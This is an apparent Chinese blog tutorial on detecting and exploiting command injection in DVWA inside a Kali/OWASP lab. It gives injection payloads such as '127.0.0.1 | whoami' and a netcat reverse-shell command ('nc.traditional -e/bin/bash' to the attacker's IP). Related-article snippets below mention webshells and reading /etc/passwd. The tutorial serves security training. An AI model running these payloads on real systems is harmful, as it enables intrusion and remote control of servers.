检测和利用命令注入漏洞(获取到反向shell)

最新推荐文章于 2024-07-10 17:14:52 发布
最新推荐文章于 2024-07-10 17:14:52 发布
阅读量186 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lang0205/article/details/131485812
版权
该文描述了一次针对DVWA(DamnVulnerableWebApplication)的命令注入测试过程。在安全等级为Low的情况下,通过不同命令连接符号注入,如`&`和`|`,测试并利用漏洞。最终,通过在KaliLinux上监听端口并利用nc工具,成功获取了OWASP靶机的反向shell。
摘要由CSDN通过智能技术生成

目录

环境准备

开启kali和owasp靶机

登录到 DVWA 中,并进入命令执行页面(Command Execution),安全等级为Low

命令连接符号说明

检测和利用命令注入漏洞案例

        在输入框输入: 192.168.xx.xx(kali主机IP)

        进行测试:

让尝试注入一个非常简单的命令。提交以下代码,

192.168.137.128&whoami

如果去掉 IP 地址,仅有whoami呢?结果如下图所示:

尝试127.0.0.1 | whoami

        现在,试着获得一个反向 shell,首先,必须确保owasp靶机上拥有需要的东西,即合适的nc工具,输入: 127.0.0.1 | ls /bin/nc*

下一步是监听 Kali Linux 中的连接。打开kali终端,运行以下命令: nc -lp 1691 -v

然后在浏览器中提交以下内容:

将看到如何在监听 Kali 终端接收连接。在这里,可以在服务器上执行命令,如下图所示:

环境准备

开启kali和owasp靶机
登录到 DVWA 中,并进入命令执行页面(Command Execution),安全等级为Low

   

命令连接符号说明

        &&:代表首先执行命令a,若成功再执行命令b,又被称为短路运算符。

        &:代表首先执行命令a再执行命令b,不管a是否成功,都会执行命令b。在执行效率上来说“&&”更加高效。

        ||:代表首先执行a命令再执行b命令,只有a命令执行不成功,才会执行b命令。

        |:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行。)

检测和利用命令注入漏洞案例

        在输入框输入: 192.168.xx.xx(kali主机IP)
        进行测试:

        这个输出看起来像是直接从 ping 命令的输出中获得的。(这表明服务器正在使用操作系统命令来执行 ping,因此可能会注入操作系统命令。)

让尝试注入一个非常简单的命令。提交以下代码,
192.168.137.128&whoami

可以看到通过whoami获取到了当前用户

(使用命令连接符号注入额外的命令)

如果去掉 IP 地址,仅有whoami呢?结果如下图所示:

发现未得到任何结果

(测试除了IP,输入其他命令的效果)

尝试127.0.0.1 | whoami

        现在,试着获得一个反向 shell,首先,必须确保owasp靶机上拥有需要的东西,即合适的nc工具,输入: 127.0.0.1 | ls /bin/nc*

(确定靶机上有NC工具,为获取反向shell做准备)

        返回一个完整路径的文件列表,有不止一个版本的 NetCat,它是用来生成连接的工具。NetCat 的 OpenBSD 版本不支持在连接上执行命令,因此将使用 traditional 。

下一步是监听 Kali Linux 中的连接。打开kali终端,运行以下命令: nc -lp 1691 -v

(在kali中打开接口,等待靶机连接)

然后在浏览器中提交以下内容:

127.0.0.1 | nc.traditional -e/bin/bash 192.168.11.130 1691 &

(利用命令连接符号,使用nc工具连到kali)

将看到如何在监听 Kali 终端接收连接。在这里,可以在服务器上执行命令,如下图所示:

21级计算机网络技术2班依木郎
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
命令注入_常见web漏洞——系统命令注入
weixin_39540020的博客
01-05 3047
在本文中,我将讲述什么是系统命令注入以及如何检测利用系统注入漏洞。并且会罗列一些针对不同操作系统比较有用的攻击命令和技术。最后则将讲述如何阻止系统命令注入攻击。什么是系统命令注入?操作系统命令注入(通常也称为脚本注入(Shell Injection))是一种web安全漏洞。攻击者可以利用其在运行应用的服务器执行任意操作系统命令。典型的后果是完全破坏应用程序及其所有数据。通常,攻击者还能...
利用SQL注入植入 webshell
小白渣的博客
02-27 6371
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union ...
检测利用命令注入漏洞
m0_71948933的博客
06-21 427
返回一个完整路径的文件列表,有不止一个版本的 NetCat,它是用来生成连接的工具。|:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行。&:代表首先执行命令a再执行命令b,不管a是否成功,都会执行命令b。||:代表首先执行a命令再执行b命令,只有a命令执行不成功,才会执行b命令。&&:代表首先执行命令a,若成功再执行命令b,又被称为短路运算符。可以看到通过whoami获取到了当前用户。
【网络安全漏洞挖掘之命令注入漏洞解析
最新发布
anquan2233的博客
07-10 1004
Atlassian Bitbucket Server 和 Data Center 是 Atlassian 推出的一款现代化代码协作平台,支持代码审查、分支权限管理、CICD 等功能。受影响的Bitbucket Server 和 Data Center版本存在使用环境变量的命令注入漏洞,具有控制其用户名权限的攻击者可以在系统上执行任意命令
ctf训练 web安全命令注入漏洞
qq_43799246的博客
12-05 2182
ctf训练 web安全命令注入漏洞 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1FG3VbDmDGHY8rOtuOFhRxA 提取码:oues 安装打开靶机(使用Oracle VM VirtualBox打开): (注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!) 接下来发现没法登陆,也没有办法获取ip地址 所以我们在kail下 进入控制台 使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机 信息
命令注入反弹shell
-
05-23 406
命令注入反弹shell dvwa
测试OS命令注入.docx
09-06
通过上述方法,不仅可以有效地检测OS命令注入漏洞,还能进一步利用这些漏洞进行更深入的安全测试和分析。对于开发者而言,确保应用程序能够正确处理用户输入是非常重要的,这包括但不限于输入验证、输出编码以及限制...
php-reverse-shell
07-24
- **漏洞利用**:在发现Web应用存在命令注入或任意文件上传漏洞时,可以利用反向Shell获取服务器控制权。 - **权限测试**:在渗透测试中,验证是否能从Web服务器获取内部网络资源。 - **恶意活动**:黑客可能会植入...
CVE-2018-3191 反弹shell
05-18
反弹Shell是指攻击者通过利用目标系统上的漏洞,使其主动连接回攻击者的计算机,而不是攻击者直接连接到受害者的服务器。这样可以避免防火墙的检测,因为流量看起来像是从受害者系统发出的正常请求。通常,攻击者会...
深度学习在代码注入检测中的机器学习方法和预处理技术综述
阵列11(2021)100077深度学习在代码注入检测中的应用综述Stanislav Abaimova,*,Giuseppe Bianchiba意大利罗马大学Tor Vergata/英国意大利罗马Tor Vergata大学A R T I C L EI N FO保留字:机器学习深度学习网络...
命令注入命令连接符详解
qq_34831410的博客
08-22 1047
学习命令注入时执行多条命令的分隔符详解
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1344
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
命令注入漏洞
qq_44915227的博客
04-23 1422
命令注入攻击(即Command Injection)是web应用程序对用户的输入提交的数据过滤不严格,导致攻击者构造恶意的特殊命令字符串的方式将数据提交到web应用程序中,从而执行外部程序或系统命令来进行攻击,非法获取目标服务器的数据资源。继承Web服务器程序(web用户)权限,去执行系统命令继承Web服务器权限,读写文件反弹Shell控制整个网站控制整个服务器测试IP地址:8.8.8.8(返回ping的结果)自己本机地址也是一样的。
Web安全——命令注入漏洞详解
热门推荐
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
命令注入攻击及其防范措施
常备不懈
05-29 608
命令注入攻击是一种通过有漏洞的应用程序在主机操作系统上执行任意命令的攻击。 当应用程序将不安全的用户输入数据(如表单、cookie、HTTP 标头等)传递给系统命令执行时,可能会发生命令注入攻击。
操作系统命令注入漏洞检测及加固
BAIXUAN9527的博客
02-26 2345
操作系统命令注入漏洞检测及加固 1.DVWA之命令注入漏洞 注入 sql注入 命令注入 提供注入的接口 - url参数 Sql 后台程序,执行我们构造的sql语句 后台执行 返回结果 Sql是命令注入的一种,针对数据库 命令注入,通过命令接口,植入系统命令 Ping的是服务器上的自己 Low 127.0.0.1&&cat /etc/passwd 命令注入 简介: 命令注入是一...
深入命令注入漏洞
Websec
10-23 9404
参考文章:https://mp.weixin.qq.com/s/VssTiWz-oExFqdEkiE9J4g   命令注入是一种常见的漏洞形态。一旦存在命令注入漏洞,攻击者就可以在目标系统执行任意命令。说到这里,我们不得不提另外一个叫做远程代码执行(RCE)的漏洞。许多人总会把这两个漏洞混淆,其实它们是有本质的区别的。命令执行只是针对系统命令,而远程代码执行针对的是编程代码,两者互不能替换。下...
安全测试系列1 命令注入漏洞
dabaoting的博客
03-05 411
命令注入漏洞常用漏洞利用SQL注入XSS(跨站脚本)漏洞CSRF(跨站请求伪造) 常用漏洞利用 闭合前后上下文 多语句分号 ; 条件执行 && || 管道符号 | SQL注入 常见漏洞: where条件:OR 1=1 union -- -:注释后面的语句 预防:使用参数化查询,避免数据被混在指令中 XSS(跨站脚本)漏洞 简介: 一种网站应用程序的安全漏洞攻击,是代码注入的一种; 它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响; 攻击通常包含了HTM
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值